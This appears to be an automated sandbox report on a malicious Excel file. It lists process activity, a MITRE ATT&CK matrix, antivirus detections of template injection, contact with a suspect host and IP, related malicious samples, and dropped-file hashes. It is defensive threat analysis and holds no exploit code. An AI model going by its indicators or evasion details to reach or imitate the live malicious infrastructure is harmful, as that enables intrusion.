Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: P-04071A.xlsStream path 'Workbook' entropy: 7.99919736287 (max. 8.0)
Source: FCE30000.0.drStream path 'Workbook' entropy: 7.99611124856 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 560Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
P-04071A.xls26%VirustotalBrowse
P-04071A.xls34%ReversingLabsDocument-Excel.Exploit.TempInj
P-04071A.xls100%AviraEXP/TempInj.MN
P-04071A.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    s.deemos.com
    14.103.79.10
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        s-part-0017.t-0009.fb-t-msedge.net
        13.107.253.45
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://s.deemos.com/liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcasefalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          14.103.79.10
          s.deemos.comChina
          18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
          131.226.2.34
          unknownUnited States
          16797UNASSIGNEDfalse
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1590669
          Start date and time:2025-01-14 13:37:35 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 11s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Without Instrumentation
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:P-04071A.xls
          Detection:MAL
          Classification:mal80.expl.winXLS@6/9@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xls
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 2.23.242.162, 52.109.76.243, 52.113.194.132, 199.232.210.172, 51.132.193.105, 51.116.246.104, 20.190.159.2, 52.149.20.212, 13.107.246.45, 13.107.253.45
          • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdgwc00.germanywestcentral.cloudapp.azure.com, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedscolprduks05.uksouth.cloudapp.azure.com, s-0005.s-msedge.net,
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          07:39:45API Interceptor609x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          14.103.79.10Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
              Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                  PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                    PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                        MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          s.deemos.comNuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          s-part-0017.t-0009.t-msedge.net1736856908fb16676aec3e4c808c4bd5cde8e123cc70360266f85ec0ed17050bca6456c9dd274.dat-decoded.exeGet hashmaliciousXWormBrowse
                          • 13.107.246.45
                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          ORDER ENQIRY #093727664.exeGet hashmaliciousFormBookBrowse
                          • 13.107.246.45
                          New purchase order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 13.107.246.45
                          ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          Signature Required_ Retail Technology Asia Employee Benefit for eddie.chan@rtasia.com.hk.emlGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          bg.microsoft.map.fastly.nethJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                          • 199.232.214.172
                          PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 199.232.210.172
                          1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                          • 199.232.210.172
                          New purchase order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 199.232.210.172
                          35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                          • 199.232.214.172
                          28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                          • 199.232.210.172
                          ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WORLDPHONE-INASNumberforInterdomainRoutingIN5.elfGet hashmaliciousUnknownBrowse
                          • 14.103.40.242
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          miori.m68k.elfGet hashmaliciousUnknownBrowse
                          • 14.103.40.215
                          UNASSIGNED3.elfGet hashmaliciousUnknownBrowse
                          • 144.74.225.103
                          sora.mpsl.elfGet hashmaliciousUnknownBrowse
                          • 146.131.7.202
                          sora.m68k.elfGet hashmaliciousUnknownBrowse
                          • 198.6.30.123
                          empsl.elfGet hashmaliciousMiraiBrowse
                          • 156.134.164.89
                          4.elfGet hashmaliciousUnknownBrowse
                          • 157.225.246.180
                          momo.mpsl.elfGet hashmaliciousMiraiBrowse
                          • 156.134.164.85
                          momo.arm7.elfGet hashmaliciousMiraiBrowse
                          • 142.152.88.214
                          1.elfGet hashmaliciousUnknownBrowse
                          • 157.225.246.188
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          6271f898ce5be7dd52b0fc260d0662b3https://delicate-twilight-4fcb7a.netlify.app/Get hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          http://latamavuelospromosco.com/Get hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 14.103.79.10
                          statement.docGet hashmaliciousKnowBe4Browse
                          • 14.103.79.10
                          phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          No context
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):118
                          Entropy (8bit):3.5700810731231707
                          Encrypted:false
                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                          MD5:573220372DA4ED487441611079B623CD
                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):970
                          Entropy (8bit):2.7144290103121165
                          Encrypted:false
                          SSDEEP:24:J3fIxk+vpCHhFGMfk6ScvBZGA8xpiOnAvJ5yoIHWJ4Ry:h3+RCHaMfkpcv/GAYcvJ5LIHM4w
                          MD5:33694DF65F2381221A32F7066C2BBF76
                          SHA1:053989F4C9DD243FBF192AE05A38A471B622E4A7
                          SHA-256:2E8FEF2D27B8CD0119223C72221E40AEE1DBD23985C02898733789AA823FB79B
                          SHA-512:7B336729095A56A8B3E865D67E8BA221823C3F0478DD08E5372D2E5C9B481963A638560EECB36777C40ED14FB01398AAA8860587588AF3BDAD9B939270A0274F
                          Malicious:false
                          Reputation:low
                          Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.3.7.4.6.3.7.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Cannot read section info
                          Category:dropped
                          Size (bytes):1536
                          Entropy (8bit):1.2684092785569034
                          Encrypted:false
                          SSDEEP:6:rl912N0xs+CFf/lX+lG8ElCl5XCB9Xh9X:rl3lKF1XanMClJCb7
                          MD5:D67D6BD29C895FD7E2C1903F23C115C0
                          SHA1:9035955719FD10AF0C1D3D99F7C60F53412CB0F6
                          SHA-256:27408F547E4E70F3C0450BE568A9102B3A12B3B504985349AF43DF23E6CE6774
                          SHA-512:45C1172FCF0A81BEBD430A2B9083EBB79F1C467313EE2981D18E87A5DE90A65A1CCA23966504234CDF9293A8F4C5DCF018D171BA0C850E726A87AF1DCD81C6FE
                          Malicious:false
                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):339968
                          Entropy (8bit):7.502841673702591
                          Encrypted:false
                          SSDEEP:6144:0k3hbdlylKsgwyzcTbWhZFVE+WaxHAcJycxdI2rHJFZpLcriO5nzdbNih7FnOIbN:NJTxdI2z/A+OZzdbNih7FnRMO4hW
                          MD5:7A3BBD8939256D306FA898112F4AB612
                          SHA1:229BE41C1411DF80B9E90AFBD4A4B80FE3DB85E1
                          SHA-256:A7D546C180A660D54D3DDD3740D8EFAF59D6371973FC585F70F79165D0CFB300
                          SHA-512:8577378265DF11DA7EB3A9273FEE64BDD4495F615BFD24C172CCC80063D54CFFEA7E6AAB58C815E4FDD822B3F1C008B1C904A4A2C1C7E9CA6D6D8F9A48578905
                          Malicious:false
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 12:39:58 2025, Security: 1
                          Category:dropped
                          Size (bytes):891904
                          Entropy (8bit):7.643817796405946
                          Encrypted:false
                          SSDEEP:24576:wpbl/Az1dbIXRMNEVVu3bVgbARM8wFzus:sbpAMX+6VVu3bVJsF
                          MD5:0862FCDA33774D082F9420D9AF4A7023
                          SHA1:6EC5D0F176244E7EBBF6CDCEDB03C0BBEE818C43
                          SHA-256:72A2CD4294229AFFB90BE557322D91D71CBE9C5E30D94A7150AB4C1E506988A4
                          SHA-512:9FE434E1E83B82A11DC96DA6C482E623FC41B7C101C277FD4A59F1E914C0C33D9C7553AB291844840384CC49CD2C304A02A9F8A6909A82988AB0B473F0DECC6C
                          Malicious:false
